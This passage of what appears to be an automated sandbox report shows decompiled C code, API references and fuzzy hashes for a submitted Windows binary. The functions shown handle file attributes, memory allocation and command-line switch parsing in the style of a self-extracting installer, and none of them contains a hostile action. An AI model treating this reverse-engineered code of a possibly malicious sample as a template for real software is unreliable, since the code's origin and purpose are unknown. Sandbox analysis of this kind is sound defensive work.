                            			}





                            0x00eb4b66
                            0x00eb4b74
                            0x00eb4b98
                            0x00eb4ba0
                            0x00000000
                            0x00eb4bac
                            0x00eb4ba4
                            0x00000000
                            0x00eb4ba4
                            0x00eb4b78
                            0x00eb4b7e
                            0x00eb4b84
                            0x00eb4b8a
                            0x00000000

                            APIs
                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00EB4FA1,00000000), ref: 00EB4B98
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: ChangeCloseFindNotification
                            • String ID:
                            • API String ID: 2591292051-0
                            • Opcode ID: bee3d6c05e091c9f6c9a2d90876d7ed16a7edf49dc5bf152a1bd13c13a6c0177
                            • Instruction ID: 4b0c5321d34d16a568300fd865e0ff61fab51bf95c6ada98432de030613ba9c4
                            • Opcode Fuzzy Hash: bee3d6c05e091c9f6c9a2d90876d7ed16a7edf49dc5bf152a1bd13c13a6c0177
                            • Instruction Fuzzy Hash: D8F01271504B089E8B718F7ACD44693BBEEAB953603101F2F95AEF22D1DF30A841CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB66AE(CHAR* __ecx) {
                            				unsigned int _t1;
                            
                            				_t1 = GetFileAttributesA(__ecx); // executed
                            				if(_t1 != 0xffffffff) {
                            					return  !(_t1 >> 4) & 0x00000001;
                            				} else {
                            					return 0;
                            				}
                            			}




                            0x00eb66b1
                            0x00eb66ba
                            0x00eb66c7
                            0x00eb66bc
                            0x00eb66be
                            0x00eb66be

                            APIs
                            • GetFileAttributesA.KERNELBASE(?,00EB4777,?,00EB4E38,?), ref: 00EB66B1
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 9a54eb59d8b242611619d63166ada77d1b30c392395b8e75a37d093f1a58413e
                            • Instruction ID: 7e2a19a53c329e1b6905dd491de625736b216f607e7d74ca5b37e097c5d2bea3
                            • Opcode Fuzzy Hash: 9a54eb59d8b242611619d63166ada77d1b30c392395b8e75a37d093f1a58413e
                            • Instruction Fuzzy Hash: 5FB0927622244056AE2017326C2A5A72941A7C123ABE82BA0F136E01E4CA3EC84AD004
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB4CA0(long _a4) {
                            				void* _t2;
                            
                            				_t2 = GlobalAlloc(0, _a4); // executed
                            				return _t2;
                            			}




                            0x00eb4caa
                            0x00eb4cb1

                            APIs
                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00EB4CAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: AllocGlobal
                            • String ID:
                            • API String ID: 3761449716-0
                            • Opcode ID: b6c2d78e5a2c29932ec42ee075d6bdd3397d1cb1aae5a3e1cb59d9227521e2e8
                            • Instruction ID: 6c064179adfad17e1862d60c92abad5e69b3040f8d58cec332399217eb82bee0
                            • Opcode Fuzzy Hash: b6c2d78e5a2c29932ec42ee075d6bdd3397d1cb1aae5a3e1cb59d9227521e2e8
                            • Instruction Fuzzy Hash: FDB0123204420CBBCF012FC3EC09F863F1DE7C4761F180010F60C450508AB294108696
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB4CC0(void* _a4) {
                            				void* _t2;
                            
                            				_t2 = GlobalFree(_a4); // executed
                            				return _t2;
                            			}




                            0x00eb4cc8
                            0x00eb4ccf

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: FreeGlobal
                            • String ID:
                            • API String ID: 2979337801-0
                            • Opcode ID: 11f32c91944d90c24233658a64834accbff82b63bac38ae481d6d97bba4cb72a
                            • Instruction ID: c2f21d0c96a76bb5075ed5fab019a4ff90f43deadb3d84304e8c1df83ce4ac68
                            • Opcode Fuzzy Hash: 11f32c91944d90c24233658a64834accbff82b63bac38ae481d6d97bba4cb72a
                            • Instruction Fuzzy Hash: 48B0123100010CBBCF012B43EC088463F1DD7C0260B040020F50C410218B7398118585
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E00EB5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				signed int _v12;
                            				CHAR* _v265;
                            				char _v266;
                            				char _v267;
                            				char _v268;
                            				CHAR* _v272;
                            				char _v276;
                            				signed int _v296;
                            				char _v556;
                            				signed int _t61;
                            				int _t63;
                            				char _t67;
                            				CHAR* _t69;
                            				signed int _t71;
                            				void* _t75;
                            				char _t79;
                            				void* _t83;
                            				void* _t85;
                            				void* _t87;
                            				intOrPtr _t88;
                            				void* _t100;
                            				intOrPtr _t101;
                            				CHAR* _t104;
                            				intOrPtr _t105;
                            				void* _t111;
                            				void* _t115;
                            				CHAR* _t118;
                            				void* _t119;
                            				void* _t127;
                            				CHAR* _t129;
                            				void* _t132;
                            				void* _t142;
                            				signed int _t143;
                            				CHAR* _t144;
                            				void* _t145;
                            				void* _t146;
                            				void* _t147;
                            				void* _t149;
                            				char _t155;
                            				void* _t157;
                            				void* _t162;
                            				void* _t163;
                            				char _t167;
                            				char _t170;
                            				CHAR* _t173;
                            				void* _t177;
                            				intOrPtr* _t183;
                            				intOrPtr* _t192;
                            				CHAR* _t199;
                            				void* _t200;
                            				CHAR* _t201;
                            				void* _t205;
                            				void* _t206;
                            				int _t209;
                            				void* _t210;
                            				void* _t212;
                            				void* _t213;
                            				CHAR* _t218;
                            				intOrPtr* _t219;
                            				intOrPtr* _t220;
                            				signed int _t221;
                            				signed int _t223;
                            
                            				_t173 = __ecx;
                            				_t61 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t61 ^ _t221;
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_t209 = 1;
                            				if(__ecx == 0 ||  *__ecx == 0) {
                            					_t63 = 1;
                            				} else {
                            					L2:
                            					while(_t209 != 0) {
                            						_t67 =  *_t173;
                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                            							_t173 = CharNextA(_t173);
                            							continue;
                            						}
                            						_v272 = _t173;
                            						if(_t67 == 0) {
                            							break;
                            						} else {
                            							_t69 = _v272;
                            							_t177 = 0;
                            							_t213 = 0;
                            							_t163 = 0;
                            							_t202 = 1;
                            							do {
                            								if(_t213 != 0) {
                            									if(_t163 != 0) {
                            										break;
                            									} else {
                            										goto L21;
                            									}
                            								} else {
                            									_t69 =  *_t69;
                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                            										break;
                            									} else {
                            										_t69 = _v272;
                            										L21:
                            										_t155 =  *_t69;
                            										if(_t155 != 0x22) {
                            											if(_t202 >= 0x104) {
                            												goto L106;
                            											} else {
                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                            												_t177 = _t177 + 1;
                            												_t202 = _t202 + 1;
                            												_t157 = 1;
                            												goto L30;
                            											}
                            										} else {
                            											if(_v272[1] == 0x22) {
                            												if(_t202 >= 0x104) {
                            													L106:
                            													_t63 = 0;
                            													L125:
                            													_pop(_t210);
                            													_pop(_t212);
                            													_pop(_t162);
                            													return E00EB6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                            												} else {
                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                            													_t177 = _t177 + 1;
                            													_t202 = _t202 + 1;
                            													_t157 = 2;
                            													goto L30;
                            												}
                            											} else {
                            												_t157 = 1;
                            												if(_t213 != 0) {
                            													_t163 = 1;
                            												} else {
                            													_t213 = 1;
                            												}
                            												goto L30;
                            											}
                            										}
                            									}
                            								}
                            								goto L131;
                            								L30:
                            								_v272 =  &(_v272[_t157]);
                            								_t69 = _v272;
                            							} while ( *_t69 != 0);
                            							if(_t177 >= 0x104) {
                            								E00EB6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                            								asm("int3");
                            								_push(_t221);
                            								_t222 = _t223;
                            								_t71 =  *0xeb8004; // 0x92ae1240
                            								_v296 = _t71 ^ _t223;
                            								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                            									0x4f0 = 2;
                            									_t75 = E00EB597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                            								} else {
                            									E00EB44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                            									 *0xeb9124 = E00EB6285();
                            									_t75 = 0;
                            								}
                            								return E00EB6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                            							} else {
                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                            								if(_t213 == 0) {
                            									if(_t163 != 0) {
                            										goto L34;
                            									} else {
                            										goto L40;
                            									}
                            								} else {
                            									if(_t163 != 0) {
                            										L40:
                            										_t79 = _v268;
                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                            											_t83 = CharUpperA(_v267) - 0x3f;
                            											if(_t83 == 0) {
                            												_t202 = 0x521;
                            												E00EB44B9(0, 0x521, 0xeb1140, 0, 0x40, 0);
                            												_t85 =  *0xeb8588; // 0x0
                            												if(_t85 != 0) {
                            													CloseHandle(_t85);
                            												}
                            												ExitProcess(0);
                            											}
                            											_t87 = _t83 - 4;
                            											if(_t87 == 0) {
                            												if(_v266 != 0) {
                            													if(_v266 != 0x3a) {
                            														goto L49;
                            													} else {
                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                            														_t215 =  &_v268 + _t167;
                            														_t183 =  &_v268 + _t167;
                            														_t50 = _t183 + 1; // 0x1
                            														_t202 = _t50;
                            														do {
                            															_t88 =  *_t183;
                            															_t183 = _t183 + 1;
                            														} while (_t88 != 0);
                            														if(_t183 == _t202) {
                            															goto L49;
                            														} else {
                            															_t205 = 0x5b;
                            															if(E00EB667F(_t215, _t205) == 0) {
                            																L115:
                            																_t206 = 0x5d;
                            																if(E00EB667F(_t215, _t206) == 0) {
                            																	L117:
                            																	_t202 =  &_v276;
                            																	_v276 = _t167;
                            																	if(E00EB5C17(_t215,  &_v276) == 0) {
                            																		goto L49;
                            																	} else {
                            																		_t202 = 0x104;
                            																		E00EB1680(0xeb8c42, 0x104, _v276 + _t167 +  &_v268);
                            																	}
                            																} else {
                            																	_t202 = 0x5b;
                            																	if(E00EB667F(_t215, _t202) == 0) {
                            																		goto L49;
                            																	} else {
                            																		goto L117;
                            																	}
                            																}
                            															} else {
                            																_t202 = 0x5d;
                            																if(E00EB667F(_t215, _t202) == 0) {
                            																	goto L49;
                            																} else {
                            																	goto L115;
                            																}
                            															}
                            														}
                            													}
                            												} else {
                            													 *0xeb8a24 = 1;
                            												}
                            												goto L50;
                            											} else {
                            												_t100 = _t87 - 1;
                            												if(_t100 == 0) {
                            													L98:
                            													if(_v266 != 0x3a) {
                            														goto L49;
                            													} else {
                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                            														_t217 =  &_v268 + _t170;
                            														_t192 =  &_v268 + _t170;
                            														_t38 = _t192 + 1; // 0x1
                            														_t202 = _t38;
                            														do {
                            															_t101 =  *_t192;
                            															_t192 = _t192 + 1;
                            														} while (_t101 != 0);
                            														if(_t192 == _t202) {
                            															goto L49;
                            														} else {
                            															_t202 =  &_v276;
                            															_v276 = _t170;
                            															if(E00EB5C17(_t217,  &_v276) == 0) {
                            																goto L49;
                            															} else {
                            																_t104 = CharUpperA(_v267);
                            																_t218 = 0xeb8b3e;
                            																_t105 = _v276;
                            																if(_t104 != 0x54) {
                            																	_t218 = 0xeb8a3a;
                            																}
                            																E00EB1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                            																_t202 = 0x104;
                            																E00EB658A(_t218, 0x104, 0xeb1140);
                            																if(E00EB31E0(_t218) != 0) {
                            																	goto L50;
                            																} else {
                            																	goto L106;
                            																}
                            															}
                            														}
                            													}
                            												} else {
                            													_t111 = _t100 - 0xa;
                            													if(_t111 == 0) {
                            														if(_v266 != 0) {
                            															if(_v266 != 0x3a) {
                            																goto L49;
                            															} else {
                            																_t199 = _v265;
                            																if(_t199 != 0) {
                            																	_t219 =  &_v265;
                            																	do {
                            																		_t219 = _t219 + 1;
                            																		_t115 = CharUpperA(_t199) - 0x45;
                            																		if(_t115 == 0) {
                            																			 *0xeb8a2c = 1;
                            																		} else {
                            																			_t200 = 2;
                            																			_t119 = _t115 - _t200;
                            																			if(_t119 == 0) {
                            																				 *0xeb8a30 = 1;
                            																			} else {
                            																				if(_t119 == 0xf) {
                            																					 *0xeb8a34 = 1;
                            																				} else {
                            																					_t209 = 0;
                            																				}
                            																			}
                            																		}
                            																		_t118 =  *_t219;
                            																		_t199 = _t118;
                            																	} while (_t118 != 0);
                            																}
                            															}
                            														} else {
                            															 *0xeb8a2c = 1;
                            														}
                            														goto L50;
                            													} else {
                            														_t127 = _t111 - 3;
                            														if(_t127 == 0) {
                            															if(_v266 != 0) {
                            																if(_v266 != 0x3a) {
                            																	goto L49;
                            																} else {
                            																	_t129 = CharUpperA(_v265);
                            																	if(_t129 == 0x31) {
                            																		goto L76;
                            																	} else {
                            																		if(_t129 == 0x41) {
                            																			goto L83;
                            																		} else {
                            																			if(_t129 == 0x55) {
                            																				goto L76;
                            																			} else {
                            																				goto L49;
                            																			}
                            																		}
                            																	}
                            																}
                            															} else {
                            																L76:
                            																_push(2);
                            																_pop(1);
                            																L83:
                            																 *0xeb8a38 = 1;
                            															}
                            															goto L50;
                            														} else {
                            															_t132 = _t127 - 1;
                            															if(_t132 == 0) {
                            																if(_v266 != 0) {
                            																	if(_v266 != 0x3a) {
                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                            																			goto L49;
                            																		}
                            																	} else {
                            																		_t201 = _v265;
                            																		 *0xeb9a2c = 1;
                            																		if(_t201 != 0) {
                            																			_t220 =  &_v265;
                            																			do {
                            																				_t220 = _t220 + 1;
                            																				_t142 = CharUpperA(_t201) - 0x41;
                            																				if(_t142 == 0) {
                            																					_t143 = 2;
                            																					 *0xeb9a2c =  *0xeb9a2c | _t143;
                            																					goto L70;
                            																				} else {
                            																					_t145 = _t142 - 3;
                            																					if(_t145 == 0) {
                            																						 *0xeb8d48 =  *0xeb8d48 | 0x00000040;
                            																					} else {
                            																						_t146 = _t145 - 5;
                            																						if(_t146 == 0) {
                            																							 *0xeb9a2c =  *0xeb9a2c & 0xfffffffd;
                            																							goto L70;
                            																						} else {
                            																							_t147 = _t146 - 5;
                            																							if(_t147 == 0) {
                            																								 *0xeb9a2c =  *0xeb9a2c & 0xfffffffe;
                            																								goto L70;
                            																							} else {
                            																								_t149 = _t147;
                            																								if(_t149 == 0) {
                            																									 *0xeb8d48 =  *0xeb8d48 | 0x00000080;
                            																								} else {
                            																									if(_t149 == 3) {
                            																										 *0xeb9a2c =  *0xeb9a2c | 0x00000004;
                            																										L70:
                            																										 *0xeb8a28 = 1;
                            																									} else {
                            																										_t209 = 0;
                            																									}
                            																								}
                            																							}
                            																						}
                            																					}
                            																				}
                            																				_t144 =  *_t220;
                            																				_t201 = _t144;
                            																			} while (_t144 != 0);
                            																		}
                            																	}
                            																} else {
                            																	 *0xeb9a2c = 3;
                            																	 *0xeb8a28 = 1;
                            																}
                            																goto L50;
                            															} else {
                            																if(_t132 == 0) {
                            																	goto L98;
                            																} else {
                            																	L49:
                            																	_t209 = 0;
                            																	L50:
                            																	_t173 = _v272;
                            																	if( *_t173 != 0) {
                            																		goto L2;
                            																	} else {
                            																		break;
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										} else {
                            											goto L106;
                            										}
                            									} else {
                            										L34:
                            										_t209 = 0;
                            										break;
                            									}
                            								}
                            							}
                            						}
                            						goto L131;
                            					}
                            					if( *0xeb8a2c != 0 &&  *0xeb8b3e == 0) {
                            						if(GetModuleFileNameA( *0xeb9a3c, 0xeb8b3e, 0x104) == 0) {
                            							_t209 = 0;
                            						} else {
                            							_t202 = 0x5c;
                            							 *((char*)(E00EB66C8(0xeb8b3e, _t202) + 1)) = 0;
                            						}
                            					}
                            					_t63 = _t209;
                            				}
                            				L131:
                            			}


































































                            0x00eb5c9e
                            0x00eb5ca9
                            0x00eb5cb0
                            0x00eb5cb3
                            0x00eb5cb6
                            0x00eb5cb7
                            0x00eb5cb8
                            0x00eb5cbd
                            0x00eb6204
                            0x00eb5ccb
                            0x00000000
                            0x00eb5ccb
                            0x00eb5cd3
                            0x00eb5cd7
                            0x00eb5cf4
                            0x00000000
                            0x00eb5cf4
                            0x00eb5cf8
                            0x00eb5d00
                            0x00000000
                            0x00eb5d06
                            0x00eb5d06
                            0x00eb5d0e
                            0x00eb5d10
                            0x00eb5d12
                            0x00eb5d14
                            0x00eb5d15
                            0x00eb5d17
                            0x00eb5d49
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb5d19
                            0x00eb5d19
                            0x00eb5d1d
                            0x00000000
                            0x00eb5d3f
                            0x00eb5d3f
                            0x00eb5d4b
                            0x00eb5d4b
                            0x00eb5d4f
                            0x00eb5d8d
                            0x00000000
                            0x00eb5d93
                            0x00eb5d93
                            0x00eb5d9a
                            0x00eb5d9d
                            0x00eb5d9e
                            0x00000000
                            0x00eb5d9e
                            0x00eb5d51
                            0x00eb5d5b
                            0x00eb5d72
                            0x00eb60fb
                            0x00eb60fb
                            0x00eb6207
                            0x00eb620a
                            0x00eb620b
                            0x00eb620e
                            0x00eb6217
                            0x00eb5d78
                            0x00eb5d78
                            0x00eb5d80
                            0x00eb5d83
                            0x00eb5d84
                            0x00000000
                            0x00eb5d84
                            0x00eb5d5d
                            0x00eb5d5f
                            0x00eb5d62
                            0x00eb5d68
                            0x00eb5d64
                            0x00eb5d64
                            0x00eb5d64
                            0x00000000
                            0x00eb5d62
                            0x00eb5d5b
                            0x00eb5d4f
                            0x00eb5d1d
                            0x00000000
                            0x00eb5d9f
                            0x00eb5d9f
                            0x00eb5da5
                            0x00eb5dab
                            0x00eb5dba
                            0x00eb6218
                            0x00eb621d
                            0x00eb6220
                            0x00eb6221
                            0x00eb6229
                            0x00eb6230
                            0x00eb6247
                            0x00eb626a
                            0x00eb6272
                            0x00eb6249
                            0x00eb6255
                            0x00eb625f
                            0x00eb6264
                            0x00eb6264
                            0x00eb6284
                            0x00eb5dc0
                            0x00eb5dc0
                            0x00eb5dca
                            0x00eb5e22
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb5dcc
                            0x00eb5dce
                            0x00eb5e24
                            0x00eb5e24
                            0x00eb5e2c
                            0x00eb5e47
                            0x00eb5e4a
                            0x00eb61d2
                            0x00eb61e2
                            0x00eb61e7
                            0x00eb61ee
                            0x00eb61f1
                            0x00eb61f1
                            0x00eb61f8
                            0x00eb61f8
                            0x00eb5e50
                            0x00eb5e53
                            0x00eb6109
                            0x00eb611f
                            0x00000000
                            0x00eb6125
                            0x00eb6137
                            0x00eb613a
                            0x00eb613c
                            0x00eb613e
                            0x00eb613e
                            0x00eb6141
                            0x00eb6141
                            0x00eb6143
                            0x00eb6144
                            0x00eb614a
                            0x00000000
                            0x00eb6150
                            0x00eb6152
                            0x00eb615c
                            0x00eb6170
                            0x00eb6172
                            0x00eb617c
                            0x00eb6190
                            0x00eb6190
                            0x00eb6196
                            0x00eb61a5
                            0x00000000
                            0x00eb61ab
                            0x00eb61b9
                            0x00eb61c6
                            0x00eb61c6
                            0x00eb617e
                            0x00eb6180
                            0x00eb618a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb618a
                            0x00eb615e
                            0x00eb6160
                            0x00eb616a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb616a
                            0x00eb615c
                            0x00eb614a
                            0x00eb610b
                            0x00eb610e
                            0x00eb610e
                            0x00000000
                            0x00eb5e59
                            0x00eb5e59
                            0x00eb5e5c
                            0x00eb604f
                            0x00eb6056
                            0x00000000
                            0x00eb605c
                            0x00eb606e
                            0x00eb6071
                            0x00eb6073
                            0x00eb6075
                            0x00eb6075
                            0x00eb6078
                            0x00eb6078
                            0x00eb607a
                            0x00eb607b
                            0x00eb6081
                            0x00000000
                            0x00eb6087
                            0x00eb6087
                            0x00eb608d
                            0x00eb609c
                            0x00000000
                            0x00eb60a2
                            0x00eb60aa
                            0x00eb60b2
                            0x00eb60b7
                            0x00eb60bd
                            0x00eb60bf
                            0x00eb60bf
                            0x00eb60d6
                            0x00eb60e0
                            0x00eb60e7
                            0x00eb60f5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb60f5
                            0x00eb609c
                            0x00eb6081
                            0x00eb5e62
                            0x00eb5e62
                            0x00eb5e65
                            0x00eb5fd3
                            0x00eb5fe9
                            0x00000000
                            0x00eb5fef
                            0x00eb5fef
                            0x00eb5ff7
                            0x00eb5ffd
                            0x00eb6003
                            0x00eb6006
                            0x00eb6011
                            0x00eb6014
                            0x00eb603d
                            0x00eb6016
                            0x00eb6018
                            0x00eb6019
                            0x00eb601b
                            0x00eb6033
                            0x00eb601d
                            0x00eb6020
                            0x00eb6029
                            0x00eb6022
                            0x00eb6022
                            0x00eb6022
                            0x00eb6020
                            0x00eb601b
                            0x00eb6042
                            0x00eb6044
                            0x00eb6046
                            0x00eb604a
                            0x00eb5ff7
                            0x00eb5fd5
                            0x00eb5fd8
                            0x00eb5fd8
                            0x00000000
                            0x00eb5e6b
                            0x00eb5e6b
                            0x00eb5e6e
                            0x00eb5f8b
                            0x00eb5f99
                            0x00000000
                            0x00eb5f9f
                            0x00eb5fa7
                            0x00eb5faf
                            0x00000000
                            0x00eb5fb1
                            0x00eb5fb3
                            0x00000000
                            0x00eb5fb5
                            0x00eb5fb7
                            0x00000000
                            0x00eb5fb9
                            0x00000000
                            0x00eb5fb9
                            0x00eb5fb7
                            0x00eb5fb3
                            0x00eb5faf
                            0x00eb5f8d
                            0x00eb5f8d
                            0x00eb5f8d
                            0x00eb5f8f
                            0x00eb5fc1
                            0x00eb5fc1
                            0x00eb5fc1
                            0x00000000
                            0x00eb5e74
                            0x00eb5e74
                            0x00eb5e77
                            0x00eb5ea0
                            0x00eb5ebd
                            0x00eb5f79
                            0x00000000
                            0x00eb5f7f
                            0x00eb5ec3
                            0x00eb5ec3
                            0x00eb5ecc
                            0x00eb5ed4
                            0x00eb5ed6
                            0x00eb5edc
                            0x00eb5edf
                            0x00eb5eea
                            0x00eb5eed
                            0x00eb5f3f
                            0x00eb5f40
                            0x00000000
                            0x00eb5eef
                            0x00eb5eef
                            0x00eb5ef2
                            0x00eb5f34
                            0x00eb5ef4
                            0x00eb5ef4
                            0x00eb5ef7
                            0x00eb5f2b
                            0x00000000
                            0x00eb5ef9
                            0x00eb5ef9
                            0x00eb5efc
                            0x00eb5f22
                            0x00000000
                            0x00eb5efe
                            0x00eb5eff
                            0x00eb5f02
                            0x00eb5f16
                            0x00eb5f04
                            0x00eb5f07
                            0x00eb5f0d
                            0x00eb5f46
                            0x00eb5f46
                            0x00eb5f09
                            0x00eb5f09
                            0x00eb5f09
                            0x00eb5f07
                            0x00eb5f02
                            0x00eb5efc
                            0x00eb5ef7
                            0x00eb5ef2
                            0x00eb5f4c
                            0x00eb5f4e
                            0x00eb5f50
                            0x00eb5f54
                            0x00eb5ed4
                            0x00eb5ea2
                            0x00eb5ea4
                            0x00eb5eaf
                            0x00eb5eaf
                            0x00000000
                            0x00eb5e79
                            0x00eb5e7d
                            0x00000000
                            0x00eb5e83
                            0x00eb5e83
                            0x00eb5e83
                            0x00eb5e85
                            0x00eb5e85
                            0x00eb5e8e
                            0x00000000
                            0x00eb5e94
                            0x00000000
                            0x00eb5e94
                            0x00eb5e8e
                            0x00eb5e7d
                            0x00eb5e77
                            0x00eb5e6e
                            0x00eb5e65
                            0x00eb5e5c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb5dd0
                            0x00eb5dd0
                            0x00eb5dd0
                            0x00000000
                            0x00eb5dd0
                            0x00eb5dce
                            0x00eb5dca
                            0x00eb5dba
                            0x00000000
                            0x00eb5d00
                            0x00eb5dd9
                            0x00eb5e04
                            0x00eb61fe
                            0x00eb5e0a
                            0x00eb5e0c
                            0x00eb5e17
                            0x00eb5e17
                            0x00eb5e04
                            0x00eb6200
                            0x00eb6200
                            0x00000000

                            APIs
                            • CharNextA.USER32(?,00000000,?,?), ref: 00EB5CEE
                            • GetModuleFileNameA.KERNEL32(00EB8B3E,00000104,00000000,?,?), ref: 00EB5DFC
                            • CharUpperA.USER32(?), ref: 00EB5E3E
                            • CharUpperA.USER32(-00000052), ref: 00EB5EE1
                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00EB5F6F
                            • CharUpperA.USER32(?), ref: 00EB5FA7
                            • CharUpperA.USER32(-0000004E), ref: 00EB6008
                            • CharUpperA.USER32(?), ref: 00EB60AA
                            • CloseHandle.KERNEL32(00000000,00EB1140,00000000,00000040,00000000), ref: 00EB61F1
                            • ExitProcess.KERNEL32 ref: 00EB61F8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                            • String ID: "$"$:$RegServer
                            • API String ID: 1203814774-25366791
                            • Opcode ID: 27f662dfb9f283098f1a279c654fda65086e9bab313072c8beff55b2299da685
                            • Instruction ID: 04233e6db18a55b31d925749516bc746076b73732552f8c980c498453a9f75e4
                            • Opcode Fuzzy Hash: 27f662dfb9f283098f1a279c654fda65086e9bab313072c8beff55b2299da685
                            • Instruction Fuzzy Hash: 81D15E73A04A455EDF368B3D8C487FB7BA5AB16308F1462AAC4C6F6191D7748E86CF01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E00EB1F90(signed int __ecx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				int _v12;
                            				struct _TOKEN_PRIVILEGES _v24;
                            				void* _v28;
                            				void* __ebx;
                            				signed int _t13;
                            				int _t21;
                            				void* _t25;
                            				int _t28;
                            				signed char _t30;
                            				void* _t38;
                            				void* _t40;
                            				void* _t41;
                            				signed int _t46;
                            
                            				_t41 = __esi;
                            				_t38 = __edi;
                            				_t30 = __ecx;
                            				if((__ecx & 0x00000002) != 0) {
                            					L12:
                            					if((_t30 & 0x00000004) != 0) {
                            						L14:
                            						if( *0xeb9a40 != 0) {
                            							_pop(_t30);
                            							_t44 = _t46;
                            							_t13 =  *0xeb8004; // 0x92ae1240
